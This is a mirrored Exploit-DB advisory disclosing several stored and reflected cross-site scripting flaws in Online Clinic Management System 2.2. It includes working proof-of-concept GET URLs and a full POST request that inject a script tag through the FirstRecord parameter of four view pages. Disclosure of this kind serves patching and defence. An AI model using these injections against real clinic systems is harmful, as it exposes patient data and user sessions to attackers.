6
[webapps] Online Clinic Management System 2.2 - Multiple Stored Cross-Site Scrip...
source link: https://www.exploit-db.com/exploits/51439
Go to the source link to view the article. You can view the picture content, updated content and better typesetting reading experience. If the link is broken, please click the button below to view the snapshot at that time.
Online Clinic Management System 2.2 - Multiple Stored Cross-Site Scripting (XSS)
# Exploit Title: Online Clinic Management System 2.2 - Multiple Stored Cross-Site Scripting (XSS)
# Date: 27-06-2019
# Exploit Author: Rafael Pedrero
# Vendor Homepage: https://bigprof.com
# Software Download Link :
https://bigprof.com/appgini/applications/online-clinic-management-system
# Version : 2.2
# Category: Webapps
# Tested on: Windows 7 64 Bits / Windows 10 64 Bits
# CVE :
# Category: webapps
# Vulnerability Type: Stored Cross-Site Scripting
1. Description
Online Clinic Management System 2.2, does not sufficiently encode
user-controlled inputs, resulting in a stored Cross-Site Scripting (XSS)
vulnerability via the /clinic/medical_records_view.php, in FirstRecord
parameter, GET and POST request.
2. Proof of Concept
GET:
http://127.0.0.1/clinic/medical_records_view.php?SelectedID=2&record-added-ok=5781&SortField=&SortDirection=&FirstRecord=%22%3E%3Cscript%3Ealert%281%29%3B%3C%2Fscript%3E&DisplayRecords=all&SearchString=
POST:
POST http://127.0.0.1/clinic/medical_records_view.php HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:70.0)
Gecko/20100101 Firefox/70.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: es-ES,es;q=0.8,en-US;q=0.5,en;q=0.3
Content-Type: multipart/form-data;
boundary=---------------------------1512016725878
Content-Length: 1172
Origin: https://127.0.0.1
Connection: keep-alive
Referer: https://127.0.0.1/clinic/medical_records_view.php
Cookie: online_clinic_management_system=bnl1ht0a4n7snalaoqgh8f85b4;
online_clinic_management_system.dvp_expand=[%22tab_medical_records-patient%22%2C%22tab_events-name_patient%22]
Upgrade-Insecure-Requests: 1
Host: 127.0.0.1
-----------------------------1512016725878
Content-Disposition: form-data; name="current_view"
DVP
-----------------------------1512016725878
Content-Disposition: form-data; name="SortField"
-----------------------------1512016725878
Content-Disposition: form-data; name="SelectedID"
1
-----------------------------1512016725878
Content-Disposition: form-data; name="SelectedField"
-----------------------------1512016725878
Content-Disposition: form-data; name="SortDirection"
-----------------------------1512016725878
Content-Disposition: form-data; name="FirstRecord"
"><script>alert(1);</script>
-----------------------------1512016725878
Content-Disposition: form-data; name="NoDV"
-----------------------------1512016725878
Content-Disposition: form-data; name="PrintDV"
-----------------------------1512016725878
Content-Disposition: form-data; name="DisplayRecords"
all
-----------------------------1512016725878
Content-Disposition: form-data; name="patient"
-----------------------------1512016725878
Content-Disposition: form-data; name="SearchString"
-----------------------------1512016725878--
1. Description
Online Clinic Management System 2.2, does not sufficiently encode
user-controlled inputs, resulting in a stored Cross-Site Scripting (XSS)
vulnerability via the /clinic/patients_view.php, in FirstRecord parameter.
2. Proof of Concept
http://127.0.0.1/clinic/patients_view.php?SelectedID=1&record-added-ok=11536&SortField=&SortDirection=&FirstRecord=%22%3E%3Cscript%3Ealert%281%29%3B%3C%2Fscript%3E&DisplayRecords=all&SearchString=
And Reflected Cross-Site Scripting (XSS) too.
# Vulnerability Type: Reflected Cross-Site Scripting
1. Description
Online Clinic Management System 2.2, does not sufficiently encode
user-controlled inputs, resulting in a Reflected Cross-Site Scripting (XSS)
vulnerability via the /clinic/events_view.php, in FirstRecord parameter.
2. Proof of Concept
http://127.0.0.1/clinic/events_view.php?SelectedID=2&record-added-ok=7758&SortField=&SortDirection=&FirstRecord=%22%3E%3Cscript%3Ealert%281%29%3B%3C%2Fscript%3E&DisplayRecords=all&SearchString=
1. Description
Online Clinic Management System 2.2, does not sufficiently encode
user-controlled inputs, resulting in a Reflected Cross-Site Scripting (XSS)
vulnerability via the /clinic/disease_symptoms_view.php, in FirstRecord
parameter.
2. Proof of Concept
http://127.0.0.1/clinic/disease_symptoms_view.php?SelectedID=1&record-added-ok=1096&SortField=&SortDirection=&FirstRecord=%22%3E%3Cscript%3Ealert%281%29%3B%3C%2Fscript%3E&DisplayRecords=all&SearchString=
Recommend
About Joyk
Aggregate valuable and interesting links.
Joyk means Joy of geeK